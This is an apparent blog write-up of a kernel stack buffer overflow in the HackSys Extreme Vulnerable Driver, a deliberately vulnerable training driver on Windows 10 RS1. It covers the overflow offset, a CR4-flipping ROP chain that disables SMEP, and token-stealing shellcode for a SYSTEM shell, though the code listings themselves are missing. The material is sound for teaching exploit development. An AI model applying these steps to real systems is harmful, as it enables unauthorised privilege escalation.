This post is a writeup of a simple Stack Buffer Overflow in HackSys Extreme Vulnerable Driver - we assume that you already have an environment setup to follow along. However, if you don't have an environment setup in this post we use:
- Windows 10 Pro x64 RS1
- HEVD 3.00
If you are not sure how to setup a kernel debugging environment you can find plenty of posts of the process online, we will not cover the process in this post.
Reversing the Driver¶
The first challenge we need to tackle is finding the IRP handler this will take the form of being a function with a huge switch case in it. Since HEVD is a relatively small driver it is quite easy to find. In larger drivers this can of course be more tricky but we won't cover that here.
Locating the IRP Handler¶
The IRP handler in HEVDv3 is located at
sub_140085078 and as stated above the function is quite a large switch case which eventually leads to all of our different IOCTL handlers. The below image shows the graph overview of the IRP handler. We will refer to this handler function as
IrpDeviceIoCtlHandler from this point onwards.
Now that we've located the IRP handler we can begin reversing.
Locating the IOCTL Handler¶
In a real world scenario we would have to reverse each of these switched to functions to find a vulnerable one, in this case we know they're all vulnerable and I've already found the routine we are targetting in this blog post from doing a string search of "Buffer overflow".
loc_14008522F is the entrypoint to our target function which is shown in the below figure.
In the above image I've already renamed the IOCTL handler routine as
sub_140086594 if you're following along) Let's open the function and look at it in some more detail.
The target function is quite small because it calls into the vulnerable function, labelled as
TriggerBufferOverflowStack in the above image (or
sub_1400865B4 if you're following along).
Reversing the Vulnerable Function¶
Finally we've arrived in the vulnerable function and we can begin looking for the vulnerability. The below code block is the decompilation of the vulnerable function. Its been cleaned up for readability.
- There is no size check on the value of
a2and since this value is controlled by us we can specify a size greater than 2048.
- This is a statically allocated buffer of 2048 bytes in kernel mode. The size here is important.
The function itself is extremely simple, we have a stack allocated buffer
Dst which is of size 2048 bytes. Then a
ProbeForRead is performed, this function checks that a user-mode buffer is present in the given address. So far so good.
Moving down the function we can see an
RtlCopyMemory call the bright-eyed among you might notice the issue here straight away. If you're unfamilar
RtlCopyMemory does exactly what you imagine, it copies a buffer from a source block to a destination block.
We can see that our stack allocated buffer
Dst is being used as the destination, the source is
Address which is our user-mode buffer and the length of bytes to copy is specified by
a2, however, at no point is there a check on whether the contents of
Address fits inside
Dst and thus if we can make our user-mode buffer greater than 2048 bytes we will have a classic stack buffer overflow. We can confirm the same story in the assembly view.
To summarise the vulnerability is a classic stack buffer overflow due to a lack of size check on a copy from user-mode to a kernel-mode buffer. The vulnerable function has a stack allocated buffer of 2048 bytes - as long as we can provide a buffer greater than 2048 bytes then we will be able to overflow the buffer and gain stack control.
Now that we've found the vulnerability statically its time to try and prove that it is exploitable - to do that we're going to use WinDbg to step through the vulnerable function and verify that we can send a buffer greater than 2048 bytes and get stack control as a result.
Interacting with the Driver¶
In order to begin dynamic analysis we'll need to build a way of interacting with the driver and sending it IOCTLs. You can use any language to do this but we're going to use C because:
- It is really nice to use when working with Windows
- Python3 ctypes absolutely sucks for this kind of thing
- Exploit portability
The below code block is a very simple C program to interact with the driver - if you're unfamilar with the Windows API then the two most important sections of code to be aware of are
For the purposes of debugging and explaining I imported the HEVD symbol file into WinDbg so that we can workaround ASLR.
If you're following along I'd recommend that you do as above and import the HEVD symbol file into WinDbg.
Verifying Input and Size¶
Remember in order to cause a buffer overflow we need to overflow the stack allocated buffer of 2048 bytes, to do this we need to confirm that we can give a size of more than this. If you recall the function
TriggerBufferOverflowStack takes two arguments, a user-mode address where our buffer is stored and a size argument. If we set a breakpoint on
BufferOverflowStackIoctlHandler we can step through to the call to the vulnerable function and check our given arguments validity.
The above figure shows clearly that we do have complete control of these arguments. The first instruction of interest is
HEVD!BufferOverflowStackIoctlHandler+0x4 where our user-mode address is moved from
rcx. The next instruction of interest is immediately after at
HEVD!BufferOverflowStackIoctlHandler+0xd where the size of our user-mode buffer is moved from
edx. We then dump those arguments to verify.
Now that we've verified we control both arguments to the vulnerable function unconditionally we can move forward with gaining control of the return address.
Gaining Control of the Return Address¶
In order to figure out where we gain control we can use a number of methods such as using a cylic pattern.
Based on the above we see that we gain control of the return address at 2072 bytes. We'll update our code accordingly.
We can run our POC again and verify that we gain control of the return address as shown in the below.
Perfect we now have control of the return address. However, we've not won yet. We have some exploit mitigations which need to be taken into consideration.
The first mitigation we need to circumvent is Supervisor Mode Execution Prevention (SMEP), this is a hardware mitigation that restricts code that resides in user-mode from being executed in ring0. In essence this prevents EoPs that rely on executing a user-mode payload.
There's a few ways we can bypass SMEP but the main one (and the one we're going to use) is to construct a ROP chain that reads the content of CR4 and then flips the 20th bit of the register - upon doing so SMEP will be disabled and we can simply jump to our user-mode payload.
In this example we are going to use APIs that are only available to medium (or higher) intgreity levels. Namely,
EnumDeviceDrivers. In a lot of EoP cases we will be at low level integrity, not medium in these cases you'll need a leak to get the base address of kernel modules. 1
First we'll create a new function in our C code called
GetKernelBase this function itself is fairly simple, all it will do is make a call to
EnumDeviceDrivers and then get the first item from the returned array the first item will be the base address for
ntoskrnl.exe. The below code only includes changes.
As you can see it is very easy to get the base address of the kernel and other drivers providing that you have access to the
EnumDeviceDrivers call. But, we're not done here. We still need to build our ROP chain to flip the 20th bit of the CR4 register.
The ROP chain itself is fairly simple, we simply need to pop our inteded CR4 value into a register and then move the contents of that register into the CR4 register thus turning off SMEP. To find gadgets we can use something such as RP++. In my case I found the below gadgets in
Now that we've got the gadgets to use we need to update our exploit to place those gadgets in the buffer at the point we control the return address so that when we return we start our ROP chain to disable SMEP.
If you're wondering why we choose the value
0x70678 to be the new value for CR4 this is because in binary this value is
1110000011001111000 which makes the 20th bit 0, which is the bit for SMEP. Let's go ahead and trace the execution in a debugger and ensure that the 20th bit of CR4 is getting correctly set to 0 to disable SMEP.
- Pay attention to the value in RCX here.
- This denotes excluded instructions. It isn't important.
As you can see in the above output from WinDbg we set a breakpoint on the memcpy then we step through the program until the return, at the return we can clearly see that our
pop rcx gadget is executed and then the value
70678 is placed in the RCX register. If we continue stepping we then see that value being written into the CR4 register thus allowing us to bypass SMEP. All that's left for us to do now is to allocate some space in user land, fill it with shellcode and get a system shell.
I'll leave this part for you to do based on whatever build of Windows you're on. I'm on RS1 in this post so I used a well known shellcode (got it from here thanks Conor ) which loops over processes and does a comparison between the current PID vs the SYSTEM PID until the SYSTEM PID is found.
You can find my full exploit below. Or scroll down to open it on GitHub. Thanks for reading!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144
In the future I will publish an article which explains that process in more detail. However in this example we're just going to use